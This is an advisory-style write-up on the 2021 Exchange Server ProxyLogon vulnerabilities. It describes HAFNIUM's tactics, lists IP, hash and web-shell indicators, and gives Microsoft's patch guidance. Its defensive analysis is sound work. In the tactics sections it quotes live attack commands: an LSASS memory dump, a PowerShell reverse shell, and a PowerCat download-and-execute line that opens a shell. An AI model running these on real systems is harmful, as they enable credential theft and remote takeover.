CVE-2021-26855 - Vulnerable Exchange Server

Description

The Exchange server is Microsoft's email, calendaring, contact, scheduling and collaboration platform that runs exclusively on the Microsoft Windows server operating system.  The Exchange server primarily uses a proprietary protocol called Messaging Application Programming Interface (MAPI) to talk to email clients.  Support for Post Office Protocol version 3 (POP3), Internet Message Access Protocol (IMAP) and Exchange ActiveSync (EAS) protocols was subsequently added.  The Simple Mail Transfer Protocol (SMTP) is used to communicate to other internet mail servers.

Problem

In January 2021, the US based security firm Volexity, which assists organisations with incident response, digital forensics and threat intelligence services detected anomalous activity from two (2) of its customers' Exchange servers through its network security monitoring service.  A large amount of data was identified being sent to IP addresses not tied to the legitimate users.  Inspection of the internet information services (IIS) logs from the Exchange servers, revealed inbound POST requests to valid files associated with images, JavaScript, cascading style sheets, and fonts used by the browser-based application, Outlook Web Access (OWA).  OWA allows a user to access email, calendars, tasks and contacts from an on-premise Exchange server.  On the 02nd Mar 2021, the Microsoft Security Response Center (MSRC) publicly disclosed Common Vulnerability and Exposure (CVE) Report CVE-2021-26855.  Volexity reported they had first observed the exploit on the 03rd Jan 2021.  Microsoft attributed the action to the Advanced Persistent Threat (APT) Group 'HAFNIUM'.  Three (3) further CVE Reports related to the Exchange server and to CVE-2021-26855 were also publicly disclosed on the same date.

Systems used for reporting and assessing the severity of security vulnerabilities

No. System Description
1. Common Vulnerabilities and Exposures (CVE). The CVE system is used to identify, define, catalogue and publicly disclosed known information-security vulnerabilities and exposures.
2. The Common Vulnerability Scoring System (CVSS) CVSS is a free and open industry standard for assessing the severity of computer system security vulnerabilities. It provides a numerical (0-10) representation of the severity of an information security vulnerability.

Microsoft Exchange Server Security Vulnerability - CVE Reports & CVSS Metrics

No. CVE Report CVSS Metrics Exchange Server Version Affected Date Disclosed
1. CVE-2021-26855 9.1 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021
2. CVE-2021-26857 6.8 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021
3. CVE-2021-26858 7.8 / 7.2 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021
4. CVE-2021-27065 7.8 Exchange Server 2010, 2013, 2016, 2019 02 Mar 2021

CVE-2021-26855: This is a server-side request forgery (SSRF) vulnerability in Exchange which allowed the attacker to send arbitrary HTTP requests and authenticate as the Exchange Server.

CVE-2021-26857: This is an insecure deserialisation vulnerability in the Unified Messaging (UM) service. Insecure deserialisation is where untrusted user-controllable data is deserialised by a program.  Exploiting this vulnerability gave HAFNIUM the ability to run code as SYSTEM on the Exchange server.  This requires administrator permission or another vulnerability to exploit.

CVE-2021-26858: This is a post-authentication arbitrary file write vulnerability in Exchange.  If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server.  They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

CVE-2021-27065: This is a post-authentication arbitrary file write vulnerability in Exchange.  If HAFNIUM could authenticate with the Exchange server then they could use this vulnerability to write a file to any path on the server.  They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin's credentials.

Note to CVE-2021-26857:
The Unified Messaging (UM) service combines voice messaging and email messaging into one mailbox that can
be accessed from many different devices.

Tactics, Techniques and Procedures

The following Tactics, Techniques and Procedures were employed by the APT Group 'HAFNIUM' responsible for the exploitation of the four (4) CVE's discovered in the Microsoft Exchange server and publicly disclosed on the 02nd Mar 2021.

Reconnaissance

All systems targeted and compromised in the attack were on-premise Exchange servers.  Prior to the initial access, active or passive scanning would have been conducted on targeted networks seeking to identify on-premise Exchange servers with web services accessible to the public internet.  The fully qualified domain name (FQDN) of an on-premise Exchange server had to be identified as a prerequisite to an attack.   This information could be extracted from knowledge of the external IP address or domain name of the publicly accessible Exchange server.  Lists of e-mail addresses of intended targets were also collected.

Resource Development

The operation and attack on the Exchange servers were primarily conducted from leased virtual private servers (VPS) in the United States.  A range of free and commercial exploit tools were used to compromise the Exchange servers and to perform unauthorised activities.

List of IP addresses used in the attack on Exchange servers.

These IP addresses are tied to the virtual private (VPS) servers and virtual private networks (VPNs) from which the operation was conducted.

Indicators of Compromise (IoC).

No. IP Address
1. 103.77.192[.]219
2. 104.140.114[.]110
3. 104.250.191[.]110
4. 108.61.246[.]56
5. 149.28.14[.]163
6. 157.230.221[.]198
7. 167.99.168[.]251
8. 185.250.151[.]72
9. 192.81.208[.]169
10. 203.160.69[.]66
11. 211.56.98[.]146
12. 5.254.43[.]18
13. 5.2.69[.]14
14. 80.92.205[.]81
15. 91.192.103[.]43

List of software tools used in the exploitation of Exchange servers

No. Method / Tool Purpose
1. Covenant This is an ASP.NET Core cross-platform application that includes a web-based interface that allows for multi-user collaboration.  Used as a command and control (C2) platform for the attack on vulnerable on-premise Exchange servers.
2. Exchange Snap-ins Exchange powershell snap-ins were used to export data in mailboxes.  A snap-in is a binary file, e.g. DLL, that contains new cmdlets.  They are a mechanism to extend the set of commands use within a powershell session, script or function.
3. Nishang This is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security and penetration testing.  Useful during all phases of penetration testing.
4. PowerCat This is an open-source powershell script that can read and write data across network connections.
5. ProcDump This is a command-line utility, and part of the Microsoft Sysinternals suite.  It was used to dump the memory of a process.
6. PsExec This is a command-line utility, and part of the Microsoft Sysinternals PsTools suite.  It was used to execute commands on remote systems and to either download or upload a file over a network share.
7. 7-Zip. This is a free and open-source file archiver utility which was used to compress data that was to be exfiltrated.
8. WinRAR This Microsoft Windows-only program file archiver utility was used to compress data prior to exfiltration.

Initial Access

Initial access was through the server-side request forgery (SSRF) vulnerability in the on-premise Exchange server.   Specially crafted HTTP POST requests were sent to the Exchange server with an Extensible Markup Language (XML) Simple Object Access Protocol (SOAP) payload to the Exchange Web Services (EWS) Application Programming Interface (API) endpoint.  The SOAP request, using specially crafted cookies, bypassed authentication and the underlying request specified in the XML was ultimately executed, allowing any operation to be perform on the users' mailbox.   The HTTP POST requests targeted files found in the folder:-

/owa/auth/Current/themes/resources

Contained in this folder are image, font and cascading stype sheet files.  Use of any of these files for the HTTP POST request appear to allow the exploit to proceed.

Files that were targets of HTTP POST requests.

No. File
1. /owa/auth/Current/themes/resources/logon.css.
2. /owa/auth/Current/themes/resources/owafont_ja.css.
3. /owa/auth/Current/themes/resources/lgnbotl.gif.
4. /owa/auth/Current/themes/resources/owafont_ko.css.
5. /owa/auth/Current/themes/resources/SegoeUI-SemiBold.eot.
7. /owa/auth/Current/themes/resources/SegoeUI-SemiLight.ttf.
7. /owa/auth/Current/themes/resources/lgnbotl.gif.

Execution

Access to the Exchange server was through the server-side request forgery (SSRF) vulnerability (CVE 2021-26855).   The NT AUTHORITY\SYSTEM account was used to create files on the Exchange server (CVE 2021-26857).  (CVE 2021-26858) and (CVE 2021-27065) were exploited for post-authentication arbitrary file write operations.  The compromise of the on-premise Exchange server, enabled access to the e-mail accounts from which data was stolen and the installation of additional malware.

Web Shells

Web shells (ASPX files) were installed on the Exchange server and used to execute malicious code via the Command Prompt (CMD.exe) and Microsoft Windows Command Shell.

Purposes for which Web shells were used in the attack on Exchange servers.

No. Purpose
1. To harvest and exfiltrate sensitive data and credentials.
2. Upload additional malware with the potential of creating, e.g. a watering hole for infection and scanning of further victims.
3. To use as a rely point to issue commands to hosts within the network without direct internet internet access.
4. To use as a command and control infrastructure, potentially in the form of a bot in a botnet or in support of compromises to additional external networks.  This may occur in the event that the threat actor intends to establish persistence on the target.

SHA256 Hashes of Web shells used in the attack on Exchange servers.

No. Web shell SHA256 Hash
1. 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
2. b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
3. 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
4. 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
5. 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
6. b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0
7. 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e
8. 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1
9. 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5
10. 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1
11. 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea
12. 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d
13. 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944

Persistence

To establish and to maintain a persistence presence or foothold on the Microsoft Exchange servers, web shells (ASPX files), malware and backdoors were used.

Web shells deployed to maintain a persistence presence on a Microsoft Exchange server.

No. Name Function
1. SIMPLESEESHARP This is a simple ASPX web shell used to write additional files to disk e.g. SPORTSBALL web shell.
2. SPORTSBALL This is an extensive web shell used to upload files and execute commands on the system.
3. China Chopper This is a web shell that provides access back into the system.  It is used by several Advanced Persistent Threat (APT) Groups.
4. ASPXSpy This is a publicly available web shell used by several Advanced Persistent Threat (APT) Groups as a backdoor payload. It may be used to fetch, install and execute additional malware payloads on an infected Microsoft Exchange server.

Defence Evasion

Web shells deployed on the Microsoft Exchange servers had names that were identical to, or similar to legitimate files.

Names of web shells detected

No. Name
1. web.aspx
2. help.aspx
3. document.aspx
4. errorEE.aspx
5. errorEEE.aspx
6. errorEW.aspx
7. errorFF.aspx
8. healthcheck.aspx
9. aspnet_www.aspx
10. aspnet_client.aspx
11. xx.aspx
12. shell.aspx
13. aspnet_iisstart.aspx
14. one.aspx

Credential Access

The command line utility ProcDump was used to dump the process memory of the Local Security Authority Subsystem Service (LSASS), from which credentials were acquired.  Web shells were used to create copies of the NTDS.dit (NT Directory Services) file that were then exfiltrated from the Microsoft servers.

Operating System Credential Dumping

No. Name Description
1. LSASS Memory The Local Security Authority Subsystem Service is a process in the Microsoft operating systems that is responsible for enforcing the security policy on the system.  LSASS stores in memory, the credentials of users that are currently logged-in to the network.  This allows users seamless access to network resources without having to re-enter their credentials.
2. NTDS.dit The NTDS.dit (NT Directory Services) file is a database that stores the Windows Active Directory data including information about user objects, groups and group membership.  It includes the password hashes for all users in the domain.  The file is stored on the domain controllers.

Following the deployment of web shell scripts, the threat actors performed the following post-exploitation activity. The following Procdump command was used to dump the LSASS process memory.

C:\windows\temp\procdump64 -accepteula -ma lsass.exe C:\windows\temp\lsass

Microsoft advised customers to monitor the following folders for LSASS dumps.

LSASS dumps

No. Folder
1. C:\windows\temp\
2. C:\root\

Lateral Movement

The command-line tool PsExec was used to execute processes on remote systems, using network shares and valid accounts.

Collection

The file archiver utilities WinRar and 7-zip were used to compress data that was to be exfilitrated.  Microsoft Exchange PowerShell snap-ins were used to export data contained in mailboxes.

The following 7-Zip command was used to compress data into ZIP files for exfiltration.

c:\ProgramData\7z a -t7z -r c:\ProgramData\it.zip c:\ProgramData\pst

Microsoft advised customers to monitor the following folder for suspicious .zip .rar and .7z files which may indicate possible data exfilitration.

ZIP files

No. Folder
1. C:\ProgramData\

Exchange PowerShell snap-ins were added and used to export data contained in mailboxes.

Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;
Get-Mailbox&#x0A
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-MailboxExportRequest -ResultSize 100
Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn;Get-MailboxExportRequest|Remove-MailboxExportRequest -Confirm:$false

Command and Control

The legitimate open-source frameworks Covenant was used for Command and Control.  Covenant is an ASP.NET Core, cross-platform application that includes a web-based interface that allows for multi-user collaboration.  ASCII encoding was used for C2 traffic.

Open source PowerShell scripts or tools were downloaded from the internet and used to establish a reverse shell connection from the compromised Exchange server to the C2 platform or to establish a connection to a remote server.

The PowerShell Nishang Framework

Nishang is a framework and collection of scripts and payloads which enables the usage of PowerShell for offensive security, penetration testing and red teaming.

Nishang was used to open a reverse shell.

powershell -nop -c "$client - New-Object Net.Sockets.TCPClient(XXXXXXXXXXX);$stream = $client.GetStream();
[byte[]]$bytes = 0.65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString ($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS' + (pwd).Path + '> '; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write ($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

PowerCat

PowerCat is an open source powershell script that brings the functionality and power of the computer networking utility Netcat to Microsoft Windows.  Traditional anti-virus solutions may be unable to detect PowerCat.

PowerCat was used to open a connection to a remote server, after it had been downloaded from the internet.

IEX (New-Object System.Net.Webclient).DownloadString ('https://raw.githubusercontent.com/besimmorhino/pwercat/master/powercat.ps1');
powercat -c XXXXXXXXXXX -p XXXXXXXX -e powershell

Exfiltration

The collected and compresses data was exfiltrated to Cloud service providers that provided secure, user-controlled end-to-end encrypted cloud storage and communications services such as the New Zealand based company MEGA Limited.

Solution

Apply all software patches released by the Microsoft Corporation in reponse to the four (4) Common Vulnerabilities and Exposures discovered in the Microsoft Exchange server that were publicly disclosed on the 02nd Mar 2021.

Mitigation tools made available by Microsoft.

No. Script Function
1. Test-ProxyLogon.ps1 This script scans the log files of an Exchange server for IoCs.  Consitutents are advised to run this script to establish if their Exchange servers were compromised.
2. Exchange On-premises Mitigation Tool (EOMT) This script contains mitigations that will help address CVE-2021-26855.  This is the most effective way to protect and mitigate an Exchange server prior to patching.

Final list of security updates required for the Exchange server.

No. Server List of Security Updates Required
1. Exchange 2010 ( End of Life - Oct 2020 ) SP3 or any SP3 RU – ( This is a Defence in Depth update )
2. Exchange 2013 SP1, CU21, CU22, CU23
3. Exchange 2016 CU8, CU9, CU10, CU11, CU12, CU13, CU14, CU15, CU16, CU17, CU19 or CU18
4. Exchange 2019 RTM, CU1, CU2, CU3, CU4, CU5, CU6, CU8 or CU7

List of Abbreviations

CU      :Cumulative Update.
RTM     :Real Time Monitoring.
RU      :Update Rollup.
SP      :Service Pack.
SU      :Security Updates.

Knowledge Base Articles on Service Pack 3 and Cumulative Updates.

No. Exchange Version Knowledge Base Articles on Update
1. Exchange 2010 Service Pack 3 KB5000978
2. Exchange 2013 - Cumulative Update 23 KB5000871
3. Exchange 2016 - Cumulative Update 18 KB5000871
4. Exchange 2016 - Cumulative Update 19 KB5000871
5. Exchange 2019 - Cumulative Update 7 KB5000871
6. Exchange 2019 - Cumulative Update 8 KB5000871

Note: Installing a later Cumulative Update (CU) after installing the Security Updates (SU) will make the Exchange server vulnerable to exploits again until such time as the Cumulative Update (CU) installed contains the March 2021 Security fixes (Exchange 2016 CU20 and Exchange 2019 CU9 - and newer - include March 2021 Security Updates)

Chart from Microsoft illustrating three paths for applying Exchange updates

Updates Path

Additional Information

Microsoft - Exchange Server Security Updates - 02 March 2021
Microsoft - Exchange Server Security Updates for older Cumulative Updates of Exchange Server - 08 March 2021
Microsoft - Upgrade Exchange to the latest Cumulative Update
Microsoft Security - HAFNIUM targeting Exchange Servers with 0-day exploits - 02 March 2021
Microsoft Security Response Center - Microsoft Exchange Server - updated 15 March 2021
Microsoft Security Response Center - Guidance for responders: 16 March 2021
Microsoft Security Response Center - On Premises Exchange Server - updated 25 March 2021
Microsoft Exchange Server Build Numbers and Release Dates
CVE-2021-26855
CVE-2021-26857
CVE-2021-26858
CVE-2021-27065
Volexity Blog - Operation Exchange Marauder: Active Exploitation of Multiple Zero-Day Microsoft Exchange Vulnerabilities
PICUS - Tactics, Techniques and Procedures (TTPs) Used by HAFNIUM to Target Microsoft Exchange Servers.
MANDIANT - Detection and Response to Exploitation of Microsoft Exchange Zero-Day Vulnerabilities
US-Cert - Mitigate Microsoft Exchange Server Vulnerabilities
GovCERT.ch - Exchange Vulnerability 2021
Tenable Blog
Everything you need to know about the Microsoft Exchange Server hack
PsExec Explainer by Mark Russinovich
Introduction - PsTools Documentation by Mark Russinovich
Hunting Malware with Windows Sysinternals - Process Explorer